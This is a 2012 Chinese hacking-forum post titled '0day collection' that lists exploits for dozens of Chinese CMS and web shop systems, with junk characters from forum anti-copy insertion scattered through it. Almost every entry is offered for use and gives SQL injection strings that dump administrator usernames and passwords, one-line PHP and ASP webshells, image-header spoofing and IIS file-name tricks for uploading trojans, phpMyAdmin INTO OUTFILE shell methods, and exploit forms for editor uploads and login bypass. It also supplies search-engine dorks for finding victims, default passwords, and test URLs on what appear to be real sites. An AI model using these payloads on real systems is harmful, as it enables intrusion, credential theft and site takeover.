找回密码
 立即注册
查看: 3736|回复: 1
打印 上一主题 下一主题

0day合集

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:58:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
启航企业建站系统 cookie注入漏洞通杀所有版本) a& W+ A/ I) C8 V2 H

4 ]7 t6 e$ s- @" _8 O8 N直接上exploit:
: {; a: Y( Q0 E9 @javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));; k5 S7 F  f* C0 g8 L7 V
test:http://www.tb11.net/system/xitong/shownews.asp?id=210% k( N, \+ M. X9 I
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------, M4 m1 _- M. l  }: X
Asprain论坛 注册用户 上传图片就可拿到webshell
( P# C: M% x1 @& a. w# Q- M3 a8 P6 \
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。7 s4 h& k0 c; H& a) X0 \
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>, v0 E. F  a2 ?  R/ G* F% R7 w& q
2.gif 为一小图片文件,一定要小,比如qq表情图片; F, H* y' M6 l/ [" l4 }$ T" b
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
( R/ O% j% I+ K9 o4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
" M1 u" P! A2 A: m7 ^! W5.q.asp;.gif- c8 F: x3 I) }
google:Powered by Asprain6 F7 E4 g+ }) I' c
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 b  Q% M6 R1 N4 L6 O

# [# C8 J1 T; `, t6 b4 _ShopNum1全部系统存在上传漏洞。" ^: M) Z9 R" `" T* f; f

- l! l5 P( S3 Y! c: `首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。. B) Y% S* I8 v9 ^8 p
按说明 提示登录后台。。
0 ^' L" Z# k1 ^- @% L8 m4 K在后台功能页面->附件管理->附件列表5 X, [# ?) s/ n0 S" [
可以直接上传.aspx 后缀木马2 J8 j$ H: t' `% l* K# {
http://demo.shopnum1.com/upload/20110720083822500.aspx7 d0 `. g: ^# f
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 ~, r: z1 _3 z4 c1 S2 y9 V7 O- Q8 o; k6 o4 o' X
牛牛CMS中小企业网站管理系统 上传漏洞  _( L/ z  @/ _
& _9 n4 v( v$ |
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。6 M% p7 K$ C8 U5 \( Z+ v$ e
后台:admin/login.asp2 M) O1 r( i) @1 y! {! X
ewebeditor 5.5 Nday
8 |6 ?0 f8 u, |& n! Dexp:
( e) k! n4 e  U/ }/ b. B<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
4 v2 N" Y& h$ G$ j<input?type=file?name=uploadfile?size=100><br><br>?
3 x) I( B) V% R( V4 a<input?type=submit?value=upload>?
3 v7 Y( J& I! o1 H6 I0 y, _</form>, {2 ]/ ^, w& S& A/ U
ps:先上传小马.0 J% [! F: r+ C0 Q% K/ N' C& W4 Y
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏- i: l4 q* R; [+ z  o( ]* E

2 Y9 i" I6 V* A* L6 s5 u1 M- R--------------------------------------------------------------------------------------------------------------------------------------------------------------------------' l9 H+ j7 W0 m( Q" I
4 s9 i% b2 n) ]4 q/ N( S
YothCMS 遍历目录漏洞  \. G- a3 X: e# r- K2 e  o5 j

, ~7 `# r0 I9 k1 @$ ]* W+ ]优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
* Y7 E7 ^7 ?! q2 U默认后台:admin/login.asp
) M$ T) @+ o  S* @- c9 g  R遍历目录:8 F8 T/ F5 v2 m0 Q: G. J& y- R- {
ewebeditor/manage/upload.asp?id=1&dir=../
3 n' E) P$ A8 q) vdata:
8 B8 ~$ f. ?$ f( ghttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa1 E0 [9 H5 g& t
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ Y8 @6 t2 O! I7 Q0 H
- C/ k! [% C5 g7 oNet112企业建站系统 1.0
+ O  c! M: y4 K' G7 C; Y4 c* `' S
源码简介:
( d! X, [7 g* v  L2 Q3 W) L. QNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
& m' U2 M7 ^. x  f! T1 f3 \添加管理员:- }7 O  m# i/ I/ X
http://www.0855.tv/admin/admin.asp?action=add&level=27 s, |) `# W. N
其实加不加都不是很重要,后台文件都没怎么作验证。3 k/ m' K' h0 t3 J+ \# J
上传路径:
/ C& _- G" o; V4 S" d* q6 M/ Nhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=2002 {1 S' v4 Z. l9 R/ @9 P+ B
http://www.0855.tv/inc/Upfile.asp?Stype=2+ H+ E0 q5 S/ W: K2 a
怎么利用自己研究。
8 s, p. W9 g' j, o遍历目录:8 }* Z% ]; k' h! c, n
http://www.0855.tv/admin/upfile.asp?path=../..
0 R% g) D! |2 U如:
5 v; o; k) _% p9 b5 ghttp://www.0855.tv/admin/upfile.asp?path=../admin7 q2 ]$ C) }1 M& ~7 z: W9 \
http://www.0855.tv/admin/upfile.asp?path=../data1 T  |8 P1 D4 A" _, G8 V
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------  }& g$ B# n+ K6 F+ K/ y- O
- v0 i" Z4 U8 @4 J7 V
易和阳光购物商城通杀 上传漏洞; ?5 f; h- g1 z9 D+ R
0 O  x, |( t& Z- b
前提要求是IIS6.0+asp坏境。( y, Q! @$ c7 C! b
漏洞文件Iheeo_upfile.asp
" a& N; ^; n$ t过滤不严.直接可以iis6.0上传$ n2 s0 b( {- f+ K: [. ^8 |
把ASP木马改成0855.asp;1.gif( [# v% U. V: t- l4 j5 ~# ^
直接放到明小子上传9 f1 y. R7 r$ {6 B9 g
Google搜索:inurl:product.asp?Iheeoid=+ i3 G- h4 x6 N$ R# a) i
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 b4 \$ _. ~( v* W1 V" {" u- U9 n2 |1 Y) T2 A
phpmyadmin后台4种拿shell方法( u- s/ I# S2 I0 Q% F

5 E; m* \) \5 e4 \方法一:
: {' D% e7 J& [CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );/ s# q; i! |& m/ a  |& E# @
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');0 \  R& U* F, E' |3 ?/ S
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';8 ]! M! k* w) |
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
7 w* Q8 f+ Q! A- c% w一句话连接密码:xiaoma
( Z1 X5 M1 d4 N* u" |, C方法二:% k6 q( G8 S& s. |6 }5 @' c, I. Z
Create TABLE xiaoma (xiaoma1 text NOT NULL);
* `+ b. F6 `2 ]Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');! T' u- C8 u, g4 T) s3 s2 ]+ b
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
3 k- T/ f+ N6 L" X: b+ S" WDrop TABLE IF EXISTS xiaoma;+ V3 h% y( T; Q, |( ~+ y2 M
方法三:! ~7 w& h2 M6 S* x; l5 p  r, q. j
读取文件内容:    select load_file('E:/xamp/www/s.php');1 A) ]( P( |# d" J( l1 e! A
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
8 u2 h2 }+ d2 ~cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
, z: o# D) i  K& M2 n( w& G方法四:. R( S8 q/ M% Y* e: L4 N
select load_file('E:/xamp/www/xiaoma.php');. e! R  ]3 \) @5 t  }& A8 L
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
/ Y. o7 M, _! K0 Y然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
3 @$ h0 h: N1 M: O+ N# B--------------------------------------------------------------------------------------------------------------------------------------------------------------------------! g+ F3 k4 v+ s" r! S& y6 U
: J2 P4 U8 z/ }
传信网络独立开发网站源码0day漏洞
* k+ S4 s1 N0 t) y2 {" v; @
2 T' k: i: ~+ T( C后台system/login.asp: p: n  k/ o( o: ~6 X+ T! N# L
进了后台有个ewebeditor
, x9 o6 G( F# q) @; s. rGoogle 搜索inurl:product1.asp?tyc=2 g+ ?/ z* D, B: ~
编辑器漏洞默认后台ubbcode/admin_login.asp  X( J5 a5 y- k7 S% [
数据库ubbcode/db/ewebeditor.mdb
' \5 U6 C5 R) i默认账号密码yzm 1111110 |8 G, O/ y2 N3 ~  f. h' v
6 h( |9 @! Z! S) Y- d8 b6 v
拿webshell方法
& x2 h9 R, O* Y3 b# l1 q# q登陆后台点击“样式管理”-选择新增样式
1 T3 z; \! k) f) H+ V样式名称:scriptkiddies 随便写 ; ]1 k) U, a$ t* p
路径模式:选择绝对路径 & W+ y$ _! g9 A- |
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
; t( U% |+ t6 [8 N) B( q% I$ z5 U图片类型比如就是我们要上传的ASP木马格式
# h$ N- N2 w/ r上传路径:/
1 X! g0 M0 w, ~- R6 I6 ?/ H+ P+ i图片限制:写上1000 免的上不了我们的asp木马; F1 s8 _/ v# n' c5 v
上传内容不要写0 g8 |" S( C: N
可以提交了
8 A) U# H4 h# T& _样式增加成功! 8 Q' k6 m, }8 d& \
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 0 U& N$ W, O8 [3 f# f7 Z
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置. L( Z0 H% u! [) l7 k
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
2 W' e1 Q$ K0 `0 D/ y上ASP木马 回车 等到路径% x9 o4 O& I. X! ?5 a. k

' B. W/ s9 v: {9 q; Q: s8 h后台:system/login.asp; W! ~2 c. M2 D5 @
Exp:
/ C, b# @" M- r3 Q! I0 H. h! Vand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master$ W9 g4 O) Q0 \" H$ H9 G' p
测试:
: }& R& ?6 I' ?, \! Shttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master2 [! D3 l7 D! P- n
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
- N+ r& }7 v& V# l--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. g+ [, x0 O) g. W4 g1 {# ~& j1 ?6 w8 Z0 K
foosun 0day 最新注入漏洞
" N3 I9 H- d7 R4 G. E) X6 Q5 A( N9 T
漏洞文件:www.xxx.com/user/SetNextOptions.asp
! W0 a! z1 L$ P4 S利用简单的方法:; y$ g7 Q0 E  G, ?. v
暴管理员帐号:, k4 f6 @- r* D
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin- M4 `, z/ S7 w% S' U" C# l+ \
暴管理员密码:4 T2 Y# I4 E2 t0 C9 z/ q9 J4 {
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
' m4 A* b% ?3 G/ Y" q5 X0 f& ]6 U--------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 w/ U* x9 T) o& q4 n

' E9 t& ^$ a) R  G网站程序的版权未知!6 R! w( b2 w9 K+ |1 J
. T8 W& t# ?+ C3 S& K5 d* `6 u
默认网站数据库:
7 H  H5 Q' |7 H9 M; Jwww.i0day.com/data/nxnews.mdb
" Q3 o2 d) c! @" ~3 M# jewebeditor 在线编辑器:, l- o/ v- t0 ~
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
! G- |, {, S, W7 G) Q& S登录地址:ewebeditor/admin_login.asp$ [1 J" W( t- l: u, \+ B1 N: A
默认密码:admin  admin
3 x! `( w( x5 f; I9 E: ]/ U登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data4 M; X# K# h- M
8 Z4 K8 C8 h9 v' y# I& }  |# W
Sql注入漏洞:7 c! q1 F& U, B" m/ n6 h
http://www.i0day.com/detail.asp?id=12
1 |! b: Z3 d, Z& zexp:
7 N3 `1 u3 m" V6 Zunion select 1,admin,password,4,5,6,7,8 from admin
7 d. ^6 x) U: T( E1 O/ V4 d: Z# a爆出明文帐号/密码" A! o. v: p, c6 Q, p- K% N* Q
7 S/ |+ O1 K* g3 y. v! X; V. ]* C
上传漏洞:- m  v1 |4 `8 Q/ y$ F
后台+upfile.asp
% N/ v0 C8 m& b, b8 L2 R  \. M" E如:
3 f5 z. [: Q+ B6 E6 L, g, ~http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。$ y$ K! I! F' `& j8 K0 p9 ]" D
shell的地址:网址+后台+成功上传的马
0 `! T& T' q$ N. _google:inurl:news.asp?lanmuName=& n) p8 c- s" w
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 I3 a1 e4 a. b: ^7 Y+ s6 S" k9 }; @2 {: l9 b: P4 r, y2 b/ V# ]
dedecms最新0day利用不进后台直接拿WEBSHELL
" Y) H# d. f$ x+ F; v0 Y% w0 C' n- y$ O' Z
拿webshell的方法如下:# ?5 j7 j4 ]- I  l
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.2 @( v/ T0 g7 S& i" ~5 u
前题条件,必须准备好自己的dede数据库,然后插入数据:% M% M0 `. O5 f
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); . E* S6 P) C& B1 u  g. D/ q, N& m
& c/ h+ f' c1 y
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
- E6 h4 M/ c/ \/ u6 [8 }% l<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
8 S  l% b8 z) s, z0 D<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />- o% L/ ~# s* \9 B8 |. A
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
; W) `2 v7 [2 U<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
& B( N1 M( n- u$ o' P" K; }<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br /># |2 ^3 T$ X% ~! a& R! a+ Y
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
5 d* D, Q3 G0 s4 m+ n. x, m8 v* E<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />9 N$ u! l" ]" c) B& Q" V
<input type="text" value="true" name="nocache" style="width:400">
# q2 o7 A8 f* q1 P- {6 y<input type="submit" value="提交" name="QuickSearchBtn"><br />8 m6 S' K& _( ~+ F
</form>
$ x6 z+ H. _5 r+ O<script>; N7 E8 d5 I2 [. \# J
function addaction()
' X/ k( R5 |" L. a: h/ w' O0 s+ I  {1 P{( T7 }" R4 _: Z& T- a* S
document.QuickSearch.action=document.QuickSearch.doaction.value;9 q! W' S: q! Y/ d+ _% t4 x( B
}
( A% R2 T3 G+ E</script>$ }$ e; X9 w) Q+ m6 n% Q
------------------------------------------------------------------------------------------------------------------------------------------------ v0 k# @$ r  e5 N

" {3 c" p' ^% f7 ?2 s: [( q4 Idedecms织梦暴最新严重0day漏洞
8 A  w7 A1 B. Ibug被利用步骤如下:1 w+ b; J/ @  V' M' y
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
* S: g& F4 H2 W4 e$ f" y9 m* B( Z把上面{}上的字母改为当前的验证码,即可直接进入网站后台。, P" }( B8 z& e7 ~1 y9 x
-------------------------------------------------------------------------------------------------------------------------------------------% n3 ^0 Z  X! [5 O. e' }( B$ A: u
" k; j- I& D) A3 I7 W5 \8 g6 L, y
多多淘宝客程序上传漏洞 6 B. W# q/ C- h
漏洞页面:% a7 T: o2 @* Z9 u1 J7 Z1 g& h
admin\upload_pic.php
, F4 @+ I0 Y: C: M. t: t传送门:
2 C' e  `6 k" n# i  g2 u1 [http://www.www.com/admin/upload_pic.php?uploadtext=slide1
4 w7 M2 _, R7 VPS:copy张图片马 直接  xxx.php 上传抓包地址!( h. U) w1 g* p; z. b& S  X
------------------------------------------------------------------------------------------------------------------------------------------------------
) M& i* H- ]0 i- f" ^% x2 W/ g1 H: e7 h% t7 k' Z  D
无忧公司系统ASP专业版后台上传漏洞! N* ^% v/ D9 h. P  T2 f
漏洞文件 后台上传
/ f* T) d$ x) l$ q. {admin/uploadPic.asp
4 g" }8 v  |8 J0 C% r漏洞利用 这个漏洞好像是雷池的
- a1 p  E, U" I! M: \  nhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=16 [% }9 v3 L% S/ d  [- k# E0 F
等到的webshell路径:, s$ Y" W3 I0 }) L' E8 G- F
/UploadFiles/scriptkiddies.asp;_2.gif
/ H* z- T1 J* H: `1 o---------------------------------------------------------------------------------------------------------------------------------------------------1 ~4 b) j3 ~9 m9 m5 E; o6 t: o7 ~

: T. ?" w+ a1 B1 F8 C' G* ?/ `住哪酒店分销联盟系统2010( n* K% B  t  D! D5 [* F* L
Search:
( ]. w$ u4 Q; r  H2 i0 W" K9 Finurl:index.php?m=hotelinfo
: N% z2 I& g' J; E% n) p6 J. yhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
; f& D/ q/ x; n- ?1 m% B默认后台:index.php?m=admin/login
8 g! Q) |" b$ t--------------------------------------------------------------------------------------------------------------------------------------------------
  [4 \: F1 u+ f5 w/ C* \3 b& @- m+ B6 k; w6 ~
inurl:info_Print.asp?ArticleID=
: F) x% t! \. G$ w后台 ad_login.asp
7 J! x" q/ D/ W  ?& B爆管理员密码:( R8 D  j$ e: p4 \
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
+ N% L; u5 C, ]4 \7 d------------------------------------------------------------------------------------------------------------------------------------------------------------6 G( ?' z7 f' f2 l! x. |
0 W% ]& |- T* i; E; B
搜索框漏洞!  g8 S% t5 x: ~9 `% T) K
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
" V  H; }; `0 D1 z9 }7 P* I! m--------------------------------------------------------------------------------------------------------------------------------------------------------( V$ a# p/ n+ e$ j
* z( N# X3 e" j6 ^* M% `
关键字:0 j( N& x+ v# B' ~3 O
inurl:/reg_TemletSel.asp?step=2* [$ S# ^" h4 s6 e! a
或者
0 Y' o( `/ N7 ]2 \! M' e电子商务自助建站--您理想的助手! i( u9 E0 A- N
-------------------------------------------------------------------------------------------------------------------------------------------------& k1 i7 C+ c3 G/ S. F/ J: W1 ^

4 Z7 ?# X# L& k' E4 DiGiveTest 2.1.0注入漏洞
# |& e/ w& ]; ~7 {* |  sVersion: <= 2.1.0: I2 ?' _( F# V  u+ n
# Homepage: http://iGiveTest.com/6 _  d( Z, T/ X. x9 y+ ?
谷歌关键字: “Powered by iGiveTest”4 x! Y. A9 ?7 |$ M- \0 c1 @+ s( N
随便注册一个帐号。然后暴管理员帐号和密码
6 ?  e3 L; f5 v/ D6 [http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
' B4 G" Z/ G* U1 T------------------------------------------------------------------------------------------------------------------------------------------------
- E' [3 p/ h8 B+ N2 a" i: \  Y" ^
& V2 |! Q% ]& bCKXP网上书店注入漏洞
) c# P; \. k+ \: p. i9 ~工具加表:shop_admin 加字段:admin2 T$ d- M3 P8 v/ i1 O3 j( {
后台:admin/login.asp
& Q$ z9 {% S3 B: e/ I7 `登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
: w" l6 N+ P* n; p% X4 S- xinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息2 [* f% L- G/ ^- C3 x  k# w
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 \/ ^  `% F- b7 r9 j- [: b7 u8 U' i0 H0 o" J/ f6 l1 X) p
段富超个人网站系统留言本写马漏洞: T" `0 @9 x/ J# n! G$ O6 U  V9 J
源码下载:http://www.mycodes.net/24/2149.htm
( G( N5 {5 e5 X4 X8 taddgbook.asp 提交一句话。, d1 i& |* Z  m7 j! e# ], g
连接: http://www.xxxx.tv/date/date3f.asp6 u7 b- R: K4 W$ t! t5 c
google:为防批量,特略!  i2 u* \, U/ j. i
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------, c6 @9 n" B' D3 ?. O% Q5 P, J
( j- V$ i" e( G& m4 H8 Q8 W3 Z
智有道专业旅游系统v1.0 注入及列目录漏洞) b8 v, I* N" m( O& ~
默认后台路径:/admin/login.asp  Y7 v, m! t  O* p
默认管理员:admin
& I4 \' i3 Q3 g: Y" v6 H默认密码:123456
4 q' `( U$ K) MSQL EXP Tset:- K& H; B- [5 J8 `% J
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin( U8 c( }" M+ d  l/ K7 q2 ~
------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 O: m/ T( o- H* x. g
6 B- e, h0 w! o7 Y3 ^
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
1 A/ P8 h' D% ?3 I( w) s6 mEXP:
2 K+ b( H% O! Y9 }  M<title>eWebeditoR3.8 for php任意文件上EXP</title>/ ?/ {$ B2 P1 M( u* {
<form action="" method=post enctype="multip& |0 I/ n4 O3 q8 a
art/form-data"> # z9 N5 B+ w! Y. g% x
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 9 v0 g$ {; m! Y' V1 G0 X0 ~
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
/ r6 W; n6 Y! o( w<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
* c% ^& L( Z. s" a6 t; Nfile:<input type=file name="uploadfile"><br> 0 i) P6 q, b" l% q8 j2 N7 S& ?
<input type=button value=submit onclick=fsubmit()> 7 T0 m* {3 ?' `- e5 h
</form><br>
: i! ?! b. V+ n, |<script>
+ R" y5 @" M$ D( s4 T! k8 V' {function fsubmit(){ ( [2 U* m: _0 m) J
form = document.forms[0];
9 U" r1 `* @( Fform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; . t0 t) }: ?6 |3 \: g1 D
alert(form.action);
: y& r  z# ]2 tform.submit();
# x; ]: M; n& t}
* E9 q, P6 A5 r, Z; R; _  T% O</script>1 o6 d4 u' h: K5 q; r
注意修改里面ewebeditor的名称还有路径。8 S5 D* V9 z, g  j
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 v- @3 s9 [3 T# K( P  a

/ U, P( }$ r. d- F; H$ L) i* ]提交’时提示ip被记录 防注入系统的利用% B8 [: ]" d1 k6 G, t/ E! m; |& H
网址:http://www.xxx.com/newslist.asp?id=122
3 [( ?1 z0 @- @6 c+ g提示“你的操作已被记录!”等信息。
( p& o/ q# B" I5 Y3 L$ A利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。2 _/ }. O- M& e& ^* t
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 B% A  D4 F9 K2 f, T
4 x) O# W& ]- r
西部商务网站管理系统 批量拿shell-0day
' `9 O# i/ p. O. C' [  _( I% k' B( o这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb + S, [* l5 L" G2 D; _
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
7 L) O0 `9 D: u; l% l( U2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
' O9 ?' L( l! R1 c+ I8 x+ s3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
/ l: x* |% F5 I* ^8 Z---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( G8 d/ r- H6 ^; \" P3 N4 Z2 Y' |
; e" a0 l, `, c) aJspRun!6.0 论坛管理后台注入漏洞0 o: j/ `6 ~9 _, d8 Q
8 C7 @# x  U& M4 W
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:8 ^* ~0 r  h& m* S
JspRun!6.0 3 R3 m, n! t: ?2 Z
漏洞描述:
1 d7 Z( ?0 A4 {, \4 x! p+ IJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。. f* |$ f" }! B
在处理后台提交的文件中ForumManageAction.java第1940行
: S+ P7 y, ?$ N) OString export = request.getParameter("export");//直接获取,没有安全过滤
. k# S% s! C" \1 G- Y6 Fif(export!=null){6 W0 a' T  [6 }& l4 V/ ^3 \
List&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了..., _, t1 R# g( h" z, F. i9 r
if(styles==null||styles.size()==0){
& D" _6 _; x* f<*参考
) D9 A2 x% ?0 A; x4 J9 B" \nuanfan@gmail.com' H( v1 N' y, z
*> SEBUG安全建议:) W" b2 I1 q! R6 q' C
www.jsprun.net
  `; f. ~; y6 r+ C(1)安全过滤变量export
( r6 v3 r9 {# o" y5 c: h(2)在查询语句中使用占位符% G$ ~/ t8 s4 \( X% S8 }
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- F: E/ s% m2 c" a
( s# n5 x7 A4 A' Y8 I* V: B+ X乌邦图企业网站系统 cookies 注入
& S" e5 {- K3 ~
9 _* `1 V  P- z- h8 \. X3 B程序完整登陆后台:/admin/login.asp
  B- o; m5 q: I2 o8 S! }默认登陆帐号:admin 密码:admin888  s( T) U! }  z
语句:(前面加个空格)
1 E3 d3 C! m, f# Y& U, nand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
) a) Q; e# }8 b7 a5 N% w或者是16个字段:
2 _/ ~% O$ _- {6 aand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin$ U# k6 O% E: X" e/ h
爆不出来自己猜字段。" }4 P" y' Z  s: B# h
注入点:http://www.untnt.com/shownews.asp?=88
2 \. o3 {7 L! ogetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp$ Q4 _! G4 l6 c! j
关键字:
' |# @4 W) f5 ?6 S4 oinurl:shownews?asp.id=2 ]: T7 h9 k7 I$ {$ {2 P
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, a; l" |% i6 q/ e: n
2 X2 @; M. q+ B- b- Q4 nCKXP网上书店注入漏洞
, G2 h+ t/ Z2 K* Z1 r; N7 S8 B7 a; D  O
工具加表:shop_admin 加字段:admin" O0 l# M% {) |# N5 n$ D! R4 S
后台:admin/login.asp
3 V- H  u- D" u登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
6 Y* o" f( s" `* T% linurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
" b1 a3 L7 W' I8 t- g; U' O# p---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" v! `8 y1 |) O1 A) D
$ e+ Q+ J( F0 ?  wYxShop易想购物商城4.7.1版本任意文件上传漏洞
$ m3 a* k6 _, s. V! J
. T: k9 _5 w& N& |, {  n- ]0 Fhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
2 I  u  `( t0 R8 R. V跳转到网站根目录上传任意文件。
